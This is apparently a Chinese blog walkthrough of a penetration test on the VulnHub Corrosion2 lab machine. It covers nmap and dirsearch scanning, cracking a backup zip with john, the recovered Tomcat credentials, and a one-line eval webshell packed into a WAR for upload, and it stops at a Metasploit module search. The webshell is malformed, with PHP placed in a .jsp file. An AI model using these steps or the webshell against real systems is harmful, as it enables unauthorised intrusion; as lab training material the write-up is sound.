Corrosion2实战渗透(一)

简介: Corrosion2实战渗透

靶机下载:

https://download.vulnhub.com/corrosion/Corrosion2.ova


实验环境


靶机:192.168.43.4

攻击机:192.168.43.123

 image.png


工具:

netdiscover      主机发现

nmap                端口扫描

dirsearch          目录扫描

msfconsole      集成工具  

unzip                解压

zip2john           提取密码信息

john                  爆破

vi                       编辑器


信息收集

netdiscover 192.168.43.0/24
arp-scan -l
nmap 192.168.43.0/24


三选一即可

 image.png

image.png

 

发现目标靶机


 image.png

 

端口扫描


nmap -A 192.168.43.4 -sS -sV -T4


image.png

 

端口发放情况为

22         /tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

80         /tcp open  http    Apache/2.4.41 (Ubuntu)

8080     /tcp open  http    Apache Tomcat 9.0.53

 

渗透思路:

1.OpenSSH 8.2p1

命令注入漏洞(CVE-2020-15778)(高危)

OpenSSH 8.4p1及之前版本中的scp的scp.c文件存在命令注入漏洞。该漏洞源于外部输入数据构造可执行命令过程中,网络系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞执行非法命令。

(115条消息) OpenSSH 命令注入漏洞(CVE-2020-15778)复现_~TQT~的博客-CSDN博客_openssh漏洞复现

3. Apache Tomcat 9.0.53   版本较高

暂未发现公开漏洞

访问80端口  8080端口

可以尝试弱口令登录试试

 

登录服务


192.168.43.4:80

 image.png

192.168.43.4:8080

image.png 

 

 

实战步骤:


1.目录扫描80端口的


python dirsearch.py -u http://192.168.43.4/

image.png

 

并未发现特殊的利用目录


2.目录扫描8080端口


python dirsearch.py http://192.168.43.4:8080/


image.png

 

发现特殊目录,readme.txt,backup.zip


访问看看readme.txt,这句话的意思是在服务器上留下了密码

嘿,兰迪!它是您的系统管理员。我在服务器上给你留了个文件,肯定没人能找到。记得用我给你的密码。

 

image.png


访问backup.zip


发现下载下来一个压缩包文件,试着破解他


image.png 

 

3.破解压缩包


cd download
ll
unzip backup.zip
//密码未知


image.png


使用破解工具暴力破解
zip2john backup.zip > password_hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt password_hash.txt  
//注意,需要建rockyou.txt解压,不然无法找到


image.png


由此可以破解出backup.zipde 密码


@administrator_hi5     (backup.zip)
解压backup.zip
unzip backup.zip
ll


image.png


可以看到tomcat的 tomcat-users.xml 文件

打开看看


cat  tomcat-users.xml 

image.png


发现tomcat的账号和密码,用这个登录tomcat服务


user username="manager"
password="melehifokivai"
roles="manager-gui"/>
user username="admin" 
password="melehifokivai" 
roles="admin-gui, manager-gui"/>

4.登录tomcat尝试上传war包反弹shell


新建一句话木马shell.jsp
<?php
eval @eval($_post['shell'])
;?>
打包成war包   jar  cvf shell.war shell.jsp


上传war包

反弹shell


image.png


访问shell失败,说明无法远程解析连接


image.png

重新换一种方式反弹shell


漏洞攻击


1.利用msf 的Tomcat 上传webshell的模块,有用户名和密码就可以使用:

msfconsole


image.png


search tomcat upload   //搜索攻击模块

image.png


相关文章
|
数据采集 机器学习/深度学习 监控
Arm Coresight 介绍
Coresight 是 ARM 架构上的一款嵌入式系统监控和调试工具,能够为系统管理员和开发人员提供便捷的系统监控和调试功能。该平台可以实时追踪和分析处理器上的活动,以深入了解潜在的性能瓶颈和问题。本文将介绍Coresight的概念、优势及其安装、配置、故障排除和调试等方面的内容,并探讨其未来发展方向和重要性。
2059 1
|
存储
STM32F103标准外设库——GPIO 输入、输出 (五)
STM32F103标准外设库——GPIO 输入、输出 (五)
859 0
STM32F103标准外设库——GPIO 输入、输出 (五)
|
网络协议 Shell 网络安全
【新手向】VulnHub靶场MONEYBOX:1 | 详细解析
这是一篇关于网络安全攻防的详细分析文章,主要讲述了新手如何通过VulnHub靶场中的MoneyBox:1来学习渗透测试的过程。文章首先介绍了环境配置,包括导入虚拟机和网络设置。接着,通过nmap工具扫描目标IP,发现了FTP服务和SSH服务。通过dirsearch工具爆破FTP服务,获取了用户名renu和密码987654321。使用该信息登录FTP,找到了一个提示性的图片,通过steghide工具发现了一个隐藏的数据文件,并通过SSH公钥验证登录
540 1
|
10月前
|
数据处理 C# Windows
WPF中实现弹出进度条窗口
【11月更文挑战第14天】在WPF中实现弹出进度条窗口,需创建进度条窗口界面(XAML)和对应的代码-behind(C#)。通过定义`ProgressWindow`类,包含`ProgressBar`和`TextBlock`,并在主窗口或逻辑代码中调用,模拟长时间任务时更新进度条,确保UI流畅。
404 0
|
11月前
|
SQL 监控 安全
sql注入场景与危害
sql注入场景与危害
|
并行计算 PyTorch Linux
【Deepin 20系统】Linux系统安装Pytorch、Torch
本文提供了在Deepin 20系统中安装PyTorch及其相关库的指南,包括创建conda环境、安装PyTorch及依赖库的步骤。
169 3
|
PHP 开发工具 git
目录爆破工具 -- dirsearch
目录爆破工具 -- dirsearch
613 0
|
缓存 编译器 程序员
嵌入式开发环境Vscode开发STM32单片机程序
嵌入式开发环境Vscode开发STM32单片机程序
415 1
|
网络协议 网络安全 Go
Kali下安装渗透测试常用工具dnsx和dirsearch
Kali下安装渗透测试常用工具dnsx和dirsearch
664 0
|
Java Maven
Maven标准目录结构介绍
src/main/java:源代码目录 src/main/resources:资源文件目录 src/test/java:测试代码目录 src/test/resources:测试资源文件目录 这里只是部分结构,像jar或者war工程如果有源代码的一般是这个结构,但这个结构也不是必须的,不同的项目不同的需求也可以有不同的结构。
775 0
Maven标准目录结构介绍